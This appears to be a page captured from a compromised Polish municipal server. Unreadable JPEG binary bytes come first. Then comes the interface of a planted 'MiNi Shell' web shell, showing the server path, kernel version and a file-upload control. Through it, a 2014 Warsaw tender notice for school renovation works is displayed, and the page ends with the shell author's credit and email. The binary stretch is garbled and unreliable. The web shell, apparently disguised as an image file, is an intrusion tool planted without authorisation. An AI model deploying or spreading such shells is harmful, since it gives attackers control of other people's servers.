JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140327/103604-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie remontu sal lekcyjnych i sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 
w Warszawie (znak sprawy ZP-53/14)</b><br>
<b>Numer ogłoszenia: 103604 - 2014; data zamieszczenia: 27.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Śródmieście , ul. Nowogrodzka 43, 00-691 Warszawa, woj. mazowieckie, tel. 022 6998449, faks 022 6998154.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu sal lekcyjnych i sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 
w Warszawie (znak sprawy ZP-53/14).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu sal lekcyjnych i sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły w budynku Zespołu Szkół nr 68 przy 
ul. Hożej 11/15 w Warszawie, zgodnie z:
1.	Dokumentacją projektową zawierającą:
1)	Projekt budowlano-wykonawczy  - branża architektura, konstrukcja -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., projektant architektury i konstrukcji mgr inż. arch. Paweł Chmielewski
2)	Projekt budowlano-wykonawczy  - branża sanitarna - remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., opracował mgr inż. Jan Mikulski.
3)	Projekt budowlano-wykonawczy  - branża roboty elektryczne -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., opracował Mariusz Łepecki.
4)	Przedmiar  robót - branża roboty ogólnobudowlane-remontowe -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r. opracowała mgr inż. Julitta Sławkowska
5)	Przedmiar  robót - branża roboty elektryczne -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., opracowała  mgr inż. Julitta Sławkowska
6)	Przedmiar  robót branża sanitarna remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., opracowała mgr inż. Julitta sławkowska. 
2.	Specyfikacją techniczną wykonania i odbioru robót budowlanych branża roboty ogólnobudowlane-remontowe -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r. opracowała mgr inż. Julitta Sławkowska.
3.	Specyfikacją techniczną wykonania i odbioru robót budowlanych branża roboty elektryczne -  remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r. opracowała mgr inż. Julitta Sławkowska .     
4.	Specyfikacją techniczną wykonania i odbioru robót budowlanych  branża sanitarna remont sal, sali gimnastycznej oraz przystosowanie lokali mieszkalnych do potrzeb szkoły wraz z wystąpieniem o zmianę sposobu użytkowania nowych pomieszczeń w budynku Zespołu Szkół nr 68 przy ul. Hożej 11/15 w Warszawie, wykonany przez  JULINEX KOSZTORYSOWANIE I PROJEKTOWANIE W BUDOWNICTWIE mgr inż. Julitta Sławkowska  dnia 6 grudnia 2013 r., opracowała mgr inż.  Julitta Sławkowska. 

Ww. opracowania stanowią załącznik nr 7 do SIWZ.

Zamawiający dopuszcza rozwiązania równoważne opisanym w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego produkty, urządzenia i technologie spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania innych urządzeń niż określone w SIWZ należy dołączyć do oferty karty katalogowe tych urządzeń.

Dane ogólne:
Budynek Zespołu Szkół przy ul. Hożej 11/15 jest budynkiem 4 - kondygnacyjnym (piwnica, parter, 2 piętra) z dwoma salami gimnastycznymi.
Na wysokim parterze znajdują się pomieszczenia biurowe a na poziomie gruntu sale gimnastyczne, pomieszczenia techniczne i magazynowe, na piętrach są sale dydaktyczne.
W budynku są dwie wydzielone pożarowo klatki schodowe.
Wskaźniki powierzchniowe obiektu:
Powierzchnia użytkowa   -  3730,00 m2
Powierzchnia całkowita   - 4436,50 m2
Kubatura        		     - 17803,6 m3

W zakres zamówienia wchodzi wykonanie m.in.:
-	Przygotowanie terenu pod budowę,
-	roboty rozbiórkowe,
-	usuwanie gruzu,
-	roboty budowlane w zakresie budynków,
-	roboty betonowe i konstrukcyjne,
-	roboty z płyt g-k,
-	roboty stolarskie i ślusarskie,
-	roboty naprawcze i tynkowe,
-	roboty posadzkarskie,
-	roboty malarskie i wykończeniowe,
-	demontaż starych i montaż nowych instalacji,
-	demontaż starych i montaż nowych opraw oświetleniowych - oświetlenie zasadnicze oraz ewakuacyjne,
-	demontaż starego i montaż nowego osprzętu elektrycznego,
-	wymiana dwóch WLZ-ów bez przebudowy układu pomiarowego,
-	wymiana części rozdzielnic elektrycznych wraz z podłączeniem istniejących   i nowych instalacji,
-	zasilenie i wykonanie instalacji oddymiania głównej klatki schodowej,
-	podłączenie klimatyzatorów,
-	podłączenie jednostek zewnętrznych klimatyzacji do istniejącej instalacji odgromowej,
-	instalacje teletechniczne: częściowy demontaż starych i montaż nowych instalacji wraz z montażem nowego osprzętu i urządzeń m.in. serwera i centrali telefonicznej,
-	wykonanie robót tymczasowych: przygotowanie i zabezpieczenie pomieszczeń.

UWAGA: 
1.	Należy wykonać protokoły badań i sprawdzeń, w tym protokół kominiarski, badań instalacji elektrycznej, wentylacji i wod.-kan.
2.	Należy wykonać dokumentację powykonawczą - rysunki i opis dokumentujące zmiany w stosunku do dokumentacji pierwotnej.
3.	Oprawy świetlówkowe oświetlenia zasadniczego średniej klasy z zapłonem elektronicznym EVG, obudową metalową fazowaną, malowaną proszkowo na kolor biały. W salach  komputerowych i lekcyjnych - raster aluminiowy wysoko polerowany pełna parabola, na korytarzach raster aluminiowy wysoko polerowany. Użyte świetlówki mają być barwy - światło dzienne ciepłe. Wszystkie oprawy muszą być skompensowane - cos fi min. 93. Oprawy ewakuacyjne muszą spełniać wymagania aktualnych przepisów m.in. autotest.
4.	Wyposażenie rozdzielnic i osprzętu elektrycznego średniej klasy, rozdzielnice wnękowe 
o obudowach wykonanych ze stali lub tworzywa odpornego na uderzenia - min. IK-08 drzwi pełne wyposażone w zamek. W przypadku niemożności dobrania rozdzielnic o zaprojektowanych ilości miejsc w rzędzie należy przyjąć rozdzielnice większe o 24 miejscach. Wszystkie urządzenia instalacji niskich prądów należy przyjąć średniej klasy spełniające wymagania opisane w dokumentacji projektowej - zakup należy uzgodnić z Użytkownikiem placówki i Zamawiającym.
5.	W trackie prowadzenia robót należy zapewnić objęcie kierownictwa robót przez osobę posiadającą uprawnienia budowlane w odpowiedniej specjalności, pełniącego obowiązki kierownika budowy w pełnym zakresie. Należy także odpowiednio zabezpieczyć i oznakować teren robót. oraz prowadzić dziennik budowy i dokonywać wpisów dla robót wykonanych zgodnie z zatwierdzonym projektem i zasadami sztuki budowlanej, a po zakończeniu robót złożyć stosowne oświadczenia Kierownika budowy dla PINB.

Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie umowy (załącznik nr 6 do SIWZ)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.33.10.00-6, 45.31.00.00-3, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 40000,00 PLN (słownie: czterdzieści tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe polegające na wykonaniu w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonego, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia obejmującego roboty w branży budowlanej, sanitarnej i elektrycznej z wyłączeniem robót w lokalach mieszkalnych. Wartość zamówienia - jednej umowy nie może być mniejsza niż 500.000,00 zł. (brutto). W zakresie wykazania spełniania przez Wykonawcę warunku należy przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Ocena spełnienia warunku udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo, w przypadku gdy Wykonawcę reprezentuje pełnomocnik,
2)	jeżeli Wykonawca, wykazując spełnianie warunków w postępowaniu, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmniejszenia wartości zamówienia lub terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ 
na terminy realizacji zamówienia,
3)	ujawnienia w trakcie robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej,
4)	ograniczenia środków budżetowych przeznaczonych na realizację zamówienia,
5)	ustawowych zmian stawki podatku od towarów i usług VAT,
6)	zmiany zakresu przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa,
7)	ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy,
8)	zmiany części zamówienia lub zgłoszenia udziału podwykonawcy lub dalszego podwykonawcy,
9)	zmiany podwykonawcy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, w celu wykazania spełniania warunków udziału w  postępowaniu wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia,
10)	działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.wrszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-691 Warszawa, ul. Nowogrodzka 43, pok. nr 308. Opłata za formularz SIWZ wynosi 162,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2014 godzina 10:00, miejsce: 00-691 Warszawa, ul. Nowogrodzka 43, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com